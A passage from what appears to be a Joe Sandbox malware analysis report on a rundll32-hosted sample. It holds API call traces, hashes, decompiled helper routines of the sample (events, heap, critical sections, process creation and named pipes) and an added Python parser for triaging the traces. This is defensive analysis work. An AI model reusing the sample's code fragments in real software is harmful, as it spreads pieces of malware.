                                          • RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B5340E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterEventLeaveSleep
                                          • String ID:
                                          • API String ID: 1925615494-0
                                          • Opcode ID: c6068be795f44071e1c44410af03a3389608df9961eddd37a441d67d1d53dd49
                                          • Instruction ID: df82f0b7f7e542bdd3229f93abed0e252f7b175952733c5c47ded2b5e4288b5c
                                          • Opcode Fuzzy Hash: c6068be795f44071e1c44410af03a3389608df9961eddd37a441d67d1d53dd49
                                          • Instruction Fuzzy Hash: 92014471644205FBD7109B61AC4EF593BECEB04752F4040A1FA0DDB290DF749A48CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B57C54: lstrlen.KERNEL32(?,?,00000000,00B5FABE), ref: 00B57C59
                                            • Part of subcall function 00B57C54: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00B57C6E
                                            • Part of subcall function 00B57C54: wsprintfA.USER32 ref: 00B57C8A
                                            • Part of subcall function 00B57C54: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00B57CA6
                                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B5FAD6
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00B5FAE5
                                          • CloseHandle.KERNEL32(00000000), ref: 00B5FAEF
                                          • GetLastError.KERNEL32 ref: 00B5FAF7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4042893638-0
                                          • Opcode ID: 088bee59281b2703548ac6fb290f05857aaaa61889dde056238d35559f5452bd
                                          • Instruction ID: b4f3139753acf84fdc5ff913e3b61d41c4d441c54905bb0203f4bdc954637cca
                                          • Opcode Fuzzy Hash: 088bee59281b2703548ac6fb290f05857aaaa61889dde056238d35559f5452bd
                                          • Instruction Fuzzy Hash: 3FF0A932205214FAD7215B65FC89F6FBFADEF41762F1041A5FA0E96091CB70458886A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InterlockedExchange.KERNEL32(00B79080,00000000), ref: 00B5E090
                                          • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00B5E0AB
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B5E0D4
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B5E0F5
                                            • Part of subcall function 00B5608A: SetEvent.KERNEL32(?,?,00B6F846), ref: 00B5609F
                                            • Part of subcall function 00B5608A: WaitForSingleObject.KERNEL32(?,000000FF,?,?,00B6F846), ref: 00B560BF
                                            • Part of subcall function 00B5608A: CloseHandle.KERNEL32(00000000,?,00B6F846), ref: 00B560C8
                                            • Part of subcall function 00B5608A: CloseHandle.KERNEL32(00000000,?,?,00B6F846), ref: 00B560D2
                                            • Part of subcall function 00B5608A: RtlEnterCriticalSection.NTDLL(?), ref: 00B560DA
                                            • Part of subcall function 00B5608A: RtlLeaveCriticalSection.NTDLL(?), ref: 00B560F2
                                            • Part of subcall function 00B5608A: CloseHandle.KERNEL32(?), ref: 00B5610E
                                            • Part of subcall function 00B5608A: LocalFree.KERNEL32(?), ref: 00B56119
                                            • Part of subcall function 00B5608A: RtlDeleteCriticalSection.NTDLL(?), ref: 00B56123
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                          • String ID:
                                          • API String ID: 1103286547-0
                                          • Opcode ID: 5854422b32073280dd644eef88dcac15afb3ecd2667de4547129e58da82e91dd
                                          • Instruction ID: 961813850c5740eaffc43d8d8e8e60a5aafa1dee7d5b6b111ae5ed33d22c711b
                                          • Opcode Fuzzy Hash: 5854422b32073280dd644eef88dcac15afb3ecd2667de4547129e58da82e91dd
                                          • Instruction Fuzzy Hash: 3DF09C3239021177DA305765AC0EF473EA9EB85762F0504A4FB0DEB2E0CF659C89C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrcatW.KERNEL32(?,?), ref: 00B6FE15
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
                                            • Part of subcall function 00B53486: GetLastError.KERNEL32 ref: 00B534D0
                                            • Part of subcall function 00B53486: WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
                                            • Part of subcall function 00B53486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
                                            • Part of subcall function 00B53486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
                                            • Part of subcall function 00B53486: SetEndOfFile.KERNEL32(?), ref: 00B53562
                                            • Part of subcall function 00B53486: CloseHandle.KERNEL32(?), ref: 00B5357A
                                          • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,00B6FA24,?,?,00001000,?,?,00001000), ref: 00B6FE38
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,00B6FA24,?,?,00001000,?,?,00001000), ref: 00B6FE5A
                                          • GetLastError.KERNEL32(?,00B6FA24,?,?,00001000,?,?,00001000), ref: 00B6FE6E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                          • String ID:
                                          • API String ID: 3370347312-0
                                          • Opcode ID: 4eff1cc7f6791cd9f3570ad8a3dc2168b11b4e8c397a40ea7eaa90621439facb
                                          • Instruction ID: 2a8ea760ec550ed8c67056e92be83be7a4dd8b8a57f478e4b4b972d7aabbc7dc
                                          • Opcode Fuzzy Hash: 4eff1cc7f6791cd9f3570ad8a3dc2168b11b4e8c397a40ea7eaa90621439facb
                                          • Instruction Fuzzy Hash: C4F0A431244205BBDB211F60AC09F6A3E65EF15751F204464FB05A61F1DB7655A0DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%
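
Added example for this report page (not Joe Sandbox code and not code from the analysed sample): a small Python parser for the "• Api.MODULE(args), ref: ADDR" lines that make up the APIs blocks above, so a large report like this one can be triaged with grep-style scripting instead of by scrolling. Its sample input is the API listing of the file-write record immediately above, copied verbatim. Two things it does are assumptions rather than documented Joe Sandbox behaviour: the rebuilt "API ID" string follows a grouping rule inferred from the records on this page (split each name into CamelCase tokens, drop tokens shorter than four characters such as Get/Set/Rtl/For and the A/W suffix, keep all-lowercase names such as lstrlen and _aulldiv whole, group tokens by occurrence count in descending order, ASCII-sort inside each group, join groups with "$"), and the CreateFile decoder reads dwDesiredAccess and dwCreationDisposition positionally, which is only right when the plugin recovered the stack slots in their natural order. That is not always the case: in the named-pipe client record further down this page the C0000000 access mask sits in the first slot, where the file-name pointer belongs, so positional decodes must be checked against the disassembly.

```python
"""Parser for the per-function 'APIs' records of a Joe Sandbox disassembly
report (the '• Api.MODULE(args), ref: ADDR' lines).

Added example; neither Joe Sandbox code nor code from the analysed sample.
The API-ID grouping rule in api_id() and the positional CreateFile decoding
in describe_createfile() are inferred from the records on this page and are
assumptions, not documented Joe Sandbox behaviour.
"""
import re
from collections import Counter

# Sample input: the API lines of the file-write record on this page, copied
# verbatim from the report (page content, not constructed data).
SAMPLE_RECORD = """\
• lstrcatW.KERNEL32(?,?), ref: 00B6FE15
  • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
  • Part of subcall function 00B53486: GetLastError.KERNEL32 ref: 00B534D0
  • Part of subcall function 00B53486: WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
  • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
  • Part of subcall function 00B53486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
  • Part of subcall function 00B53486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
  • Part of subcall function 00B53486: SetEndOfFile.KERNEL32(?), ref: 00B53562
  • Part of subcall function 00B53486: CloseHandle.KERNEL32(?), ref: 00B5357A
• WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,00B6FA24,?,?,00001000,?,?,00001000), ref: 00B6FE38
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,00B6FA24,?,?,00001000,?,?,00001000), ref: 00B6FE5A
• GetLastError.KERNEL32(?,00B6FA24,?,?,00001000,?,?,00001000), ref: 00B6FE6E
"""

LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"          # argument list is absent for e.g. memset.NTDLL
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_record(text):
    """Return one dict per API line: api, module, args, ref (int), subcall."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:                         # headers, 'Memory Dump Source', etc.
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["mod"], "args": args,
                      "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return calls


TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z_][a-z0-9_]*")


def tokens(api):
    """'WaitForSingleObject' -> ['Wait', 'Single', 'Object'].
    Tokens shorter than four characters (Get, Set, Rtl, For, Ex, the A/W
    suffix) are dropped; all-lowercase names (lstrlen, _aulldiv) stay whole."""
    return [t for t in TOKEN_RE.findall(api) if len(t) >= 4]


def api_id(calls):
    """Rebuild the report's 'API ID' string: tokens grouped by occurrence
    count (descending), ASCII-sorted inside a group, groups joined by '$'."""
    counts = Counter(t for c in calls for t in tokens(c["api"]))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))


GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def describe_createfile(call):
    """Decode dwDesiredAccess (slot 1) and dwCreationDisposition (slot 4) of a
    CreateFileA/W trace, assuming the plugin recovered the slots in their
    natural order. Returns None for other APIs or unresolved ('?') slots."""
    if not call["api"].startswith("CreateFile") or len(call["args"]) < 5:
        return None
    try:
        access = int(call["args"][1], 16)
        disp = int(call["args"][4], 16)
    except ValueError:                    # slot printed as '?'
        return None
    names = [n for bit, n in GENERIC.items() if access & bit] or [hex(access)]
    return "|".join(names) + ", " + DISPOSITION.get(disp, hex(disp))


def summarize(text):
    """One greppable line per call: address, API, decoded CreateFile flags."""
    out = []
    for c in parse_record(text):
        extra = describe_createfile(c)
        out.append(f"{c['ref']:08X} {c['api']}" + (f"  [{extra}]" if extra else ""))
    return out


if __name__ == "__main__":
    print("API ID:", api_id(parse_record(SAMPLE_RECORD)))
    print("\n".join(summarize(SAMPLE_RECORD)))
```

Run against the record above, api_id() reproduces the report's `File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat`, and summarize() shows the two CREATE_NEW opens with GENERIC_READ|GENERIC_WRITE followed by the GENERIC_READ OPEN_EXISTING open, which is what a reviewer checks before reading the disassembly.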

                                          C-Code - Quality: 100%
                                           			E048924BC(void* __esi) {
                                           				struct _SECURITY_ATTRIBUTES* _v4; // decompiler type; used as a BOOL success flag
                                           				void* _t8;
                                           				void* _t10;
                                           
                                           				_v4 = 0;
                                           				memset(__esi, 0, 0x38); // zero the 0x38-byte context block passed in ESI
                                           				_t8 = CreateEventA(0, 1, 0, 0); // manual-reset event, initially non-signaled
                                           				 *(__esi + 0x1c) = _t8;
                                           				if(_t8 != 0) {
                                           					_t10 = CreateEventA(0, 1, 1, 0); // manual-reset event, initially signaled
                                           					 *(__esi + 0x20) = _t10;
                                           					if(_t10 == 0) {
                                           						CloseHandle( *(__esi + 0x1c)); // second event failed: release the first one
                                           					} else {
                                           						_v4 = 1; // both events created
                                           					}
                                           				}
                                           				return _v4;
                                           			}

                                          APIs
                                          • memset.NTDLL ref: 048924CA
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,76DC81D0), ref: 048924DF
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 048924EC
                                          • CloseHandle.KERNEL32(?), ref: 048924FE
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                           • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: a06104c60c2602c154a4d4154f3655dd34dee976762a91b422abe1948e2831d5
                                          • Instruction ID: e23740e45779d21ca22851078a2ac2701aa96154c87a54f48ed1b356e1cf1121
                                          • Opcode Fuzzy Hash: a06104c60c2602c154a4d4154f3655dd34dee976762a91b422abe1948e2831d5
                                          • Instruction Fuzzy Hash: F0F054F1104B0CBFD7106F25DCC4C27BBDCEB451ACB154E6DF146C1501D675AC094A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B6647F
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00B6A696,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 00B66494
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B5D3E9,?,?), ref: 00B664A1
                                          • CloseHandle.KERNEL32(?,?,?,?,00B5D3E9,?,?), ref: 00B664B3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 066f4ac674c1c36fa8ec5602d6a5fb72fe1cd851dd788081dd8dc008c4827717
                                          • Instruction ID: 22375bf0322d0ae764eda307e4485dc1e0766cd9922094317d4e881bc7a6e856
                                          • Opcode Fuzzy Hash: 066f4ac674c1c36fa8ec5602d6a5fb72fe1cd851dd788081dd8dc008c4827717
                                          • Instruction Fuzzy Hash: D6F0F4B510470C7FD3106F65DCC4C27BBDCEB56299711896EF24682611DA7AA8154EA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B55EDF
                                          • RtlExitUserThread.NTDLL(00000000), ref: 00B55EF2
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B55F03
                                          • _aulldiv.NTDLL(?,?,00002710,00000000), ref: 00B55F16
                                            • Part of subcall function 00B6A952: lstrlen.KERNEL32(00B5B047,00000000,00000000,00000000,?,00B7090A,?,00B5B047,00000000), ref: 00B6A968
                                            • Part of subcall function 00B6A952: lstrlen.KERNEL32(?,?,00B7090A,?,00B5B047,00000000), ref: 00B6A96F
                                            • Part of subcall function 00B6A952: RtlAllocateHeap.NTDLL(00000000,00000029), ref: 00B6A97D
                                            • Part of subcall function 00B6A952: wsprintfA.USER32 ref: 00B6A99F
                                            • Part of subcall function 00B6A952: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 00B6A9D0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$FreeTimelstrlen$AllocateExitFileSystemThreadUser_aulldivwsprintf
                                          • String ID:
                                          • API String ID: 157450322-0
                                          • Opcode ID: 1fa9c0d68bf6cf10db6cbdbcad0253563fd44319847a45141af11293d83fa258
                                          • Instruction ID: d457aebfa6152de37cd02838b1385718ede559c1c14553fa52ec4811ed04a589
                                          • Opcode Fuzzy Hash: 1fa9c0d68bf6cf10db6cbdbcad0253563fd44319847a45141af11293d83fa258
                                          • Instruction Fuzzy Hash: 9BF06972500204BFDB115BA9DC0EF8B7BACEB46722F1104A9F21DA31A0DB70AD95CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,00B69299,000000FF,0614B7F0,?,?,00B6BB0E,0000003A,0614B7F0), ref: 00B570B7
                                          • GetLastError.KERNEL32(?,?,00B6BB0E,0000003A,0614B7F0,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B570C2
                                          • WaitNamedPipeA.KERNEL32(00002710), ref: 00B570E4
                                          • WaitForSingleObject.KERNEL32(00000000,?,?,00B6BB0E,0000003A,0614B7F0,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B570F2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                          • String ID:
                                          • API String ID: 4211439915-0
                                          • Opcode ID: 605948ce782d4e866f14a742d761900f56a42c33fe546d46f124b8f1ef653054
                                          • Instruction ID: c73010aa2b7efb54800dbd5cb8844c3bce1b4a3001152d76281f716b42840e63
                                          • Opcode Fuzzy Hash: 605948ce782d4e866f14a742d761900f56a42c33fe546d46f124b8f1ef653054
                                          • Instruction Fuzzy Hash: 4FF06232645121ABD2211765AC8DB967F95EB11373F1245A1FE1EF75E0DB210CD4C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,?,00000000,00B5FABE), ref: 00B57C59
                                          • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00B57C6E
                                          • wsprintfA.USER32 ref: 00B57C8A
                                            • Part of subcall function 00B5B968: memset.NTDLL ref: 00B5B97D
                                            • Part of subcall function 00B5B968: lstrlenW.KERNEL32(00000000,00000000,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9B6
                                            • Part of subcall function 00B5B968: wcstombs.NTDLL ref: 00B5B9C0
                                            • Part of subcall function 00B5B968: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9F1
                                            • Part of subcall function 00B5B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA1D
                                            • Part of subcall function 00B5B968: TerminateProcess.KERNEL32(?,000003E5), ref: 00B5BA33
                                            • Part of subcall function 00B5B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA47
                                            • Part of subcall function 00B5B968: CloseHandle.KERNEL32(?), ref: 00B5BA7A
                                            • Part of subcall function 00B5B968: CloseHandle.KERNEL32(?), ref: 00B5BA7F
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00B57CA6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                          • String ID:
                                          • API String ID: 1624158581-0
                                          • Opcode ID: e843027e84e5b2f7ede309ff82bc46b70c8fd36432081cb735b91d37ae9737b1
                                          • Instruction ID: 376e81ec7815d652f512921c5f28498d123db93f2c1061d9cfeaf47e4fc23153
                                          • Opcode Fuzzy Hash: e843027e84e5b2f7ede309ff82bc46b70c8fd36432081cb735b91d37ae9737b1
                                          • Instruction Fuzzy Hash: ECF054326441117BD6211729BC4DF6B7AADDBC2722F1501A5FE09D72A0DF2088858660
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B5CDC8
                                          • Sleep.KERNEL32(0000000A), ref: 00B5CDD2
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5CDFA
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B5CE18
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 6336b3a1cac30e3630599433d7e8d7052c83cd7f6f2c9d0e513f300f8d581b42
                                          • Instruction ID: f05559f853602cdcb04315d706a3298a6d719d52465392deffe724b3cf5c2509
                                          • Opcode Fuzzy Hash: 6336b3a1cac30e3630599433d7e8d7052c83cd7f6f2c9d0e513f300f8d581b42
                                          • Instruction Fuzzy Hash: 1DF05E716447419FEB219BA8DC49F063BE5EB11302F0588A0FA1ED72E1CB30E898CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                           			E04895976() {
                                           				void* _t1;
                                           				intOrPtr _t5;
                                           				void* _t6;
                                           				void* _t7;
                                           				void* _t11;
                                           
                                           				_t1 =  *0x489a30c; // 0x2cc, global event handle
                                           				if(_t1 == 0) {
                                           					L8:
                                           					return 0;
                                           				}
                                           				SetEvent(_t1); // signal the event so waiting workers can finish
                                           				_t11 = 0x7fffffff; // remaining wait budget in milliseconds
                                           				while(1) {
                                           					SleepEx(0x64, 1); // alertable 100 ms sleep, so queued APCs still run
                                           					_t5 =  *0x489a35c; // 0x0, loop while this global stays nonzero
                                           					if(_t5 == 0) {
                                           						break;
                                           					}
                                           					_t11 = _t11 - 0x64;
                                           					if(_t11 > 0) {
                                           						continue;
                                           					}
                                           					break; // budget exhausted
                                           				}
                                           				_t6 =  *0x489a30c; // 0x2cc
                                           				if(_t6 != 0) {
                                           					CloseHandle(_t6);
                                           				}
                                           				_t7 =  *0x489a2d8; // 0x4e50000, private heap handle (also used by E04893F7E)
                                           				if(_t7 != 0) {
                                           					HeapDestroy(_t7);
                                           				}
                                           				goto L8;
                                           			}

                                          APIs
                                          • SetEvent.KERNEL32(000002CC,00000001,04893DC4), ref: 04895981
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04895990
                                          • CloseHandle.KERNEL32(000002CC), ref: 048959B1
                                          • HeapDestroy.KERNEL32(04E50000), ref: 048959C1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                           • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: 64257f97028512496d237d838bbf09b3b9553c1c887af2749164701c3faca7a2
                                          • Instruction ID: cfdda2020a725e5c267420f832cf672492f09f71498d5d873ab205ea26400d8d
                                          • Opcode Fuzzy Hash: 64257f97028512496d237d838bbf09b3b9553c1c887af2749164701c3faca7a2
                                          • Instruction Fuzzy Hash: 0BF01CB2B01B11BBFF266B79E848B5637D8EB04771B0C0E18BC15D7280DF28EC409960
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                           			E04893F7E() {
                                           				void* _v0;
                                           				void** _t3;
                                           				void** _t5;
                                           				void** _t7;
                                           				void** _t8;
                                           				void* _t10;
                                           
                                           				_t3 =  *0x489a3cc; // 0x52495b0, global context pointer
                                           				__imp__( &(_t3[0x10])); // unresolved import; the APIs list identifies it as RtlEnterCriticalSection (ref 04893F87)
                                           				while(1) {
                                           					_t5 =  *0x489a3cc; // 0x52495b0
                                           					_t1 =  &(_t5[0x16]); // 0x0
                                           					if( *_t1 == 0) {
                                           						break;
                                           					}
                                           					Sleep(0xa); // spin in 10 ms steps, critical section held, until the field at +0x16 clears
                                           				}
                                           				_t7 =  *0x489a3cc; // 0x52495b0
                                           				_t10 =  *_t7;
                                           				if(_t10 != 0 && _t10 != 0x489b81a) { // 0x489b81a lies inside the 0x4890000 image, so it is not a heap block
                                           					HeapFree( *0x489a2d8, 0, _t10); // same private heap E04895976 destroys on shutdown
                                           					_t7 =  *0x489a3cc; // 0x52495b0
                                           				}
                                           				 *_t7 = _v0; // install the replacement pointer
                                           				_t8 =  &(_t7[0x10]);
                                           				__imp__(_t8); // unresolved import; the APIs list identifies it as RtlLeaveCriticalSection (ref 04893FD4)
                                           				return _t8;
                                           			}

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(05249570), ref: 04893F87
                                          • Sleep.KERNEL32(0000000A), ref: 04893F91
                                          • HeapFree.KERNEL32(00000000), ref: 04893FBF
                                          • RtlLeaveCriticalSection.NTDLL(05249570), ref: 04893FD4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                           • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 3403d337f77ca11e6063df5b9c5420242519a12f9fae1cd455f9e67142f19115
                                          • Instruction ID: 9d3630292a1e6ebd7720adbf4ea2d04b6ce3f3266e0bb7d7d3e6d190e20bea41
                                          • Opcode Fuzzy Hash: 3403d337f77ca11e6063df5b9c5420242519a12f9fae1cd455f9e67142f19115
                                          • Instruction Fuzzy Hash: 26F0D4B4300A42AFEB18AF69EC49E2637F4EB48301B0D4908ED12D7390CA38BC00EA11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B6299C
                                          • Sleep.KERNEL32(0000000A), ref: 00B629A6
                                          • HeapFree.KERNEL32(00000000), ref: 00B629D4
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B629E9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
